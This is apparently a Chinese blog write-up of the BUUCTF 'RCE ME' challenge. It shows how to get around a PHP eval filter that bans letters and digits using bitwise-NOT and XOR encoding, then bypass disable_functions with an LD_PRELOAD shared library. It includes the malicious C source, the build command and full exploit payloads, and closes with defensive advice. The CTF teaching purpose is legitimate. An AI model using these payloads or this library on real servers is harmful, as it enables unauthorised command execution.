当前位置：首页 > article >正文

BUUCTF：[极客大挑战 2019]RCE ME 深度解析：从正则绕开到LD_PRELOAD的完整利用链

article 2026/5/10 21:55:58

1. 题目背景与初步分析BUUCTF的[极客大挑战 2019]RCE ME是一道典型的PHP代码审计与绕过题目。题目给出了一个简单的PHP页面核心代码如下?php error_reporting(0); if(isset($_GET[code])){ $code$_GET[code]; if(strlen($code)40){ die(太长了); } if(preg_match(/[A-Za-z0-9]/,$code)){ die(太简单了); } eval($code); } else{ highlight_file(__FILE__); } ?这段代码有几个关键限制输入的code参数长度不能超过40个字符不能包含任何字母和数字最终会通过eval执行我们的输入面对这样的限制常规的RCE方法基本都被堵死了。我们需要找到一种既不需要字母数字又足够简洁的payload构造方式。2. 绕过正则限制2.1 取反编码绕过原理PHP中有一个非常有趣的特性通过取反运算符(~)和URL编码可以构造出完全不包含字母数字的payload。具体原理是PHP允许使用~对字符串进行按位取反操作取反后的字符串可以通过urlencode编码最终得到的是一串百分号开头的编码完全符合题目要求举个例子要执行phpinfo()我们可以这样做php -r echo urlencode(~phpinfo); # 输出%8F%97%8F%96%91%99%90然后构造payload?code(~%8F%97%8F%96%91%99%90)();这个payload完全避开了字母数字检测长度也符合要求。2.2 其他绕过方法对比除了取反编码还有几种常见的绕过方式异或运算通过字符间的异或运算生成所需函数名自增技巧利用PHP的类型转换特性字符串拼接通过.运算符组合特殊字符但在本题中由于长度限制取反编码是最优解。我实测过其他方法要么长度超标要么构造过于复杂。3. 分析disable_functions限制成功执行phpinfo()后我们发现服务器配置了严格的disable_functionspcntl_alarm, pcntl_fork, ..., system, exec, shell_exec, popen, proc_open, passthru, ...基本上所有能直接执行系统命令的函数都被禁用了。这意味着即使我们拿到了webshell也无法直接执行系统命令。这种情况下我们需要寻找不依赖这些函数的RCE方法。经过分析发现以下几个突破口LD_PRELOAD环境变量劫持PHP FFI扩展如果启用ImageMagick漏洞如果安装其中LD_PRELOAD是最可靠的方案因为它不依赖任何PHP函数只需要能上传文件和执行PHP代码在Linux系统上普遍可用4. LD_PRELOAD利用详解4.1 原理剖析LD_PRELOAD是Linux系统的一个环境变量它可以指定在程序运行前优先加载的动态链接库。我们可以利用这个特性编写一个恶意.so文件定义一些关键函数的替代实现通过LD_PRELOAD让目标程序加载我们的.so当目标程序调用这些函数时实际执行的是我们的代码关键在于PHP的mail()函数会隐式调用外部程序sendmail这就给了我们注入的机会。4.2 实际操作步骤首先准备一个恶意的C代码// bypass_disablefunc.c #include stdlib.h #include stdio.h #include string.h void payload() { const char* cmd getenv(CMD); system(cmd); } int geteuid() { if (getenv(LD_PRELOAD) NULL) { return 0; } unsetenv(LD_PRELOAD); payload(); }编译为共享库gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so上传.so文件到服务器本题中/var/tmp可写构造最终的payload?code${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);_assert__include(/var/tmp/shell.php)cmd/readflagoutpath/tmp/tmpfilesopath/var/tmp/bypass_disablefunc_x64.so这个payload做了以下几件事使用取反编码绕过初始限制包含一个特制的PHP脚本设置CMD环境变量为/readflag指定.so文件路径5. 完整利用链总结回顾整个利用过程可以分为四个关键阶段代码审计分析题目给出的PHP代码理解限制条件正则绕过使用取反编码技术构造无字母数字的payload环境侦察通过phpinfo()获取服务器配置信息权限突破利用LD_PRELOAD绕过disable_functions限制在实际渗透测试中这种层层递进的思路非常实用。每个环节都需要考虑多种可能性并选择最合适的绕过方法。6. 防御建议从防御角度可以采取以下措施避免直接使用eval执行用户输入使用白名单而非黑名单过滤特殊字符限制上传目录的执行权限定期更新PHP版本修复已知漏洞使用SELinux等强制访问控制机制这道题很好地展示了安全防护的深度防御原则 - 即使突破了第一道防线后面还应该有其他防护措施。

BUUCTF：[极客大挑战 2019]RCE ME 深度解析：从正则绕开到LD_PRELOAD的完整利用链

相关文章：

BUUCTF：[极客大挑战 2019]RCE ME 深度解析：从正则绕开到LD_PRELOAD的完整利用链

如何快速提取Unity游戏素材：AssetStudio完整使用指南

“社恐”技术大牛周志明的写作哲学：如何像他一样，用开源文档和博客打造个人技术品牌

LinkSwift：如何让网盘下载从龟速到光速？这款工具给出了答案

如何快速掌握思源宋体：7种免费商用字体让你的设计瞬间专业

GetQzonehistory：5分钟免费备份你的QQ空间青春回忆

程序员转大模型，这8个必备框架，新手也能快速落地项目

Anylogic建模效率翻倍秘诀：活用‘智能体类型’实现模块化设计与复用

ECharts地图可视化踩坑实录：从GeoJSON数据获取到本地开发跨域问题的全链路解决

Vivado里用OSERDESE2+OBUFDS实现LVDS输出，一个完整可复用的Verilog模块（含XDC约束）

编程应届生面试，HR最常问的20个问题，高分答案都在这里

Transformer架构优化实战2026：注意力机制、KV Cache与推理加速完整指南

对比自行维护多个API密钥，Taotoken的密钥管理与审计日志更省心

从选型到调试：MCP2517FD与ATA6563收发器搭配实战避坑指南

别再只配防火墙了！华为USG+交换机联动配置实战：让内网用户顺利上网的完整闭环

观察不同时段调用Taotoken多模型API的延迟波动情况

5分钟掌握LayerDivider：AI图像分层工具终极指南

WeChatMsg完整指南：如何永久保存并深度分析你的微信聊天记录

【管理科学】【财务领域】第四十九篇企业资本通过金融工具获取资本与通过制造舆论冲突吸引注意力01

30_AI短片实战第三弹：头盔一致性、连续动作推导与情绪特写叠加（附提示词）

OpenClaw用户迁移至Taotoken平台的具体配置步骤详解

告别虚拟机卡顿：在Windows 11的WSL2里为树莓派4B编译Automotive Grade Linux镜像

Unity UGUI点击事件避坑指南：为什么你的Image点了没反应？

3分钟快速上手：免费AI语音修复工具VoiceFixer终极指南 [特殊字符]

Windows与Office终极激活指南：KMS_VL_ALL_AIO智能脚本免费解决方案

Diablo Edit2深度解析：技术架构与安全使用的暗黑2存档编辑完全手册

为Claude Code配置Taotoken解决密钥被封与Token不足痛点

为团队统一开发环境利用Taotoken CLI一键配置多模型密钥

BooruDatasetTagManager：AI训练数据标注效率提升10倍的智能解决方案

【C语言】16 位的值，通过几种不同的方式将其拆分为高 8 位和低 8 位